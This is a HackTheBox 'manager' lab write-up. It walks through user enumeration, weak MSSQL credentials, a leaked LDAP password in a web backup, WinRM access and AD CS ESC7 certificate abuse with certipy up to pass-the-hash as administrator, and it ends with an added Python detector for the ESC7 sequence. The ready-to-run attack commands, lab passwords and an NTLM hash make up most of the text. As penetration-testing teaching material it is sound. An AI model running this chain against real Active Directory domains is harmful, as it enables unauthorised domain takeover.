HTB: manager Writeup

Machine Information
| Attribute | Details |
|---|---|
| Name | manager |
| OS | Windows |
| Difficulty | Medium |
| Points | N/A |
| Release Date | N/A |
| IP Address | 10.129.142.52 |
| Author | D3vnomi |
Machine Rating
⭐⭐⭐⭐☆ (7.0/10)
Difficulty Assessment:
- Enumeration: ⭐⭐⭐☆☆
- Real-world: ⭐⭐⭐⭐☆
- CVE: ⭐⭐☆☆☆
- CTF-like: ⭐⭐⭐☆☆
Summary
manager is a Medium-difficulty Windows Active Directory machine. The exploitation path involves Kerberos user enumeration, gaining MSSQL database access with weak credentials, discovering backup files containing LDAP credentials, lateral movement via WinRM, and finally privilege escalation through AD CS (Active Directory Certificate Services) ESC7 exploitation.
TL;DR: Kerbrute enumeration → MSSQL access → Backup file discovery → LDAP credentials → WinRM access → AD CS ESC7 exploitation → Administrator.
Reconnaissance
Initial Setup
Domain: manager.htb
Domain Controller: dc01.manager.htb
Technologies: MSSQL, IIS, LDAP, AD CS (Certificate Services)
```bash
echo "10.129.142.52 manager.htb dc01.manager.htb" >> /etc/hosts
```
User Enumeration
Using kerbrute to enumerate valid Active Directory users:
```bash
kerbrute userenum -d manager.htb --dc dc01.manager.htb wordlist.txt
```
Discovered Users:
- ryan
- guest
- cheng
- raven
- administrator
- operator
- jinwoo
Initial Foothold
MSSQL Access
The user operator has a weak password that matches the username. Connected to the MSSQL database with these credentials:
```bash
impacket-mssqlclient -p 1433 -windows-auth -dc-ip 10.129.142.52 "manager.htb/Operator:Operator"@10.129.142.52
```
Once authenticated, enumerated the IIS web directory:
```sql
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
```
Result: Discovered the file website-backup-27-07-23-old.zip in the web root.
User Compromise
Backup File Analysis
Downloaded the backup file from the web server:
```bash
wget http://manager.htb/website-backup-27-07-23-old.zip
unzip website-backup-27-07-23-old.zip
```
Analyzed the configuration files and discovered .old-conf.xml containing LDAP credentials:
```text
user: raven@manager.htb
password: R4v3nBe5tD3veloP3r!123
server: dc01.manager.htb
port: 389
```
WinRM Access
Used the discovered credentials to gain shell access:
```bash
evil-winrm -i 10.129.142.52 -u raven -p 'R4v3nBe5tD3veloP3r!123'
```
Successfully authenticated as raven on the domain.
User Flag
```powershell
cat C:\Users\raven\Desktop\user.txt
```
🚩 User Flag: <REDACTED>
Privilege Escalation
AD CS ESC7 Exploitation
The Certificate Authority (manager-DC01-CA) has misconfigured permissions: raven holds ManageCA rights, which allows privilege escalation through certificate abuse (ESC7).
Step 1: Add raven as CA Officer
```bash
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.52
```
Step 2: Enable SubCA Template
```bash
certipy ca -ca 'manager-DC01-CA' -enable-template 'SubCA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.52
```
Step 3: Request Certificate as Administrator
```bash
certipy req -ca 'manager-DC01-CA' -target 10.129.142.52 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -template SubCA -upn administrator@manager.htb
```
The request is denied by the template but remains in the CA's pending queue under its request ID (19 here).
Step 4: Issue the Certificate Request
```bash
certipy ca -ca 'manager-DC01-CA' -issue-request 19 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.52
```
Step 5: Retrieve the Issued Certificate
```bash
certipy req -ca 'manager-DC01-CA' -target 10.129.142.52 -retrieve 19 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
```
This generates administrator.pfx.
Step 6: Authenticate with Administrator Certificate
```bash
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.129.142.52
```
Result: Obtained the administrator NTLM hash:
```text
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```
Step 7: PSExec as Administrator
```bash
python3 psexec.py manager.htb/administrator@10.129.142.52 -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```
Successfully gained SYSTEM-level access.
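From the defender's side, the ESC7 chain above leaves a distinctive trail in CA auditing: an account grants itself certificate manager (officer) rights, then a request it submitted is issued with a SAN UPN belonging to someone else. The following detection is an added example, not part of the original writeup; the event records are constructed and simplified (real Security events 4890 and 4887 carry these facts in their message text, which a SIEM would normalise into fields first).

```python
"""Flag an ESC7-style sequence in constructed AD CS audit events (added example)."""

# Constructed sample: what a collector would see for the chain in this writeup.
# 4890 = certificate manager settings changed, 4887 = request approved and issued.
SAMPLE_EVENTS = [
    {"id": 4890, "actor": "MANAGER\\raven", "new_officer": "MANAGER\\raven"},
    {"id": 4887, "request_id": 19, "requester": "MANAGER\\raven",
     "template": "SubCA", "san_upn": "administrator@manager.htb"},
    {"id": 4887, "request_id": 20, "requester": "MANAGER\\ryan",
     "template": "User", "san_upn": "ryan@manager.htb"},
]


def account_of_upn(upn: str) -> str:
    """Return the account part of a UPN (before '@'), lower-cased."""
    return upn.split("@", 1)[0].lower()


def sam_of(account: str) -> str:
    """Return the sAMAccountName part of DOMAIN\\user, lower-cased."""
    return account.split("\\", 1)[-1].lower()


def detect_esc7(events):
    """Return findings for issuances whose SAN UPN does not match the requester.

    A requester that previously made itself a CA officer (4890) is rated
    'high', since officer rights are what allow a pending request to be issued.
    """
    self_added_officer = set()
    findings = []
    for ev in events:
        if ev["id"] == 4890 and sam_of(ev["actor"]) == sam_of(ev["new_officer"]):
            self_added_officer.add(sam_of(ev["actor"]))
        elif ev["id"] == 4887:
            requester = sam_of(ev["requester"])
            if account_of_upn(ev["san_upn"]) != requester:
                findings.append({
                    "request_id": ev["request_id"],
                    "requester": requester,
                    "san_upn": ev["san_upn"],
                    "template": ev["template"],
                    "severity": "high" if requester in self_added_officer else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in detect_esc7(SAMPLE_EVENTS):
        print(finding)
```

Only request 19 is flagged: raven both granted herself officer rights and had a SubCA certificate issued for administrator's UPN, while ryan's own User certificate passes.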
Root Flag
```powershell
type C:\Users\Administrator\Desktop\root.txt
```
🚩 Root Flag: <REDACTED>
Attack Chain Summary
```mermaid
graph TD
    A["Kerbrute User Enumeration"] --> B["MSSQL Access (operator:operator)"]
    B --> C["Directory Listing via xp_dirtree"]
    C --> D["Discover website-backup-27-07-23-old.zip"]
    D --> E["Extract LDAP Credentials (raven)"]
    E --> F["WinRM Access as raven"]
    F --> G["Add raven as CA Officer"]
    G --> H["Enable SubCA Template"]
    H --> I["Request Admin Certificate"]
    I --> J["Issue Certificate"]
    J --> K["Retrieve Administrator PFX"]
    K --> L["Authenticate with Certificate"]
    L --> M["Obtain Admin Hash"]
    M --> N["PSExec - SYSTEM Access"]
```
Tools Used
| Tool | Purpose |
|---|---|
| kerbrute | Kerberos user enumeration |
| impacket-mssqlclient | MSSQL database client and interaction |
| evil-winrm | Windows Remote Management (WinRM) shell access |
| wget | File downloads from web server |
| certipy | Active Directory Certificate Services (AD CS) exploitation |
| psexec.py | Windows process execution via SMB |
| python3 | Scripting and exploit execution |
| unzip | Archive extraction |
Key Learnings
- Weak default credentials (username = password) on database services are a critical entry point.
- Backup and configuration files often contain sensitive data like plaintext passwords for directory services.
- The MSSQL xp_dirtree stored procedure can be leveraged to enumerate file system paths from the database.
- Active Directory Certificate Services (AD CS) misconfigurations can be exploited for privilege escalation (ESC7).
- Certificate-based authentication can be more effective than password-based attacks when the CA is misconfigured.
- Thorough enumeration across all services is essential — MSSQL access led to web backup discovery, which led to domain credentials.
Author
D3vnomi
Disclaimer
This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.
Last Updated: 08 Mar 2026
Tags: #HackTheBox #Windows #Medium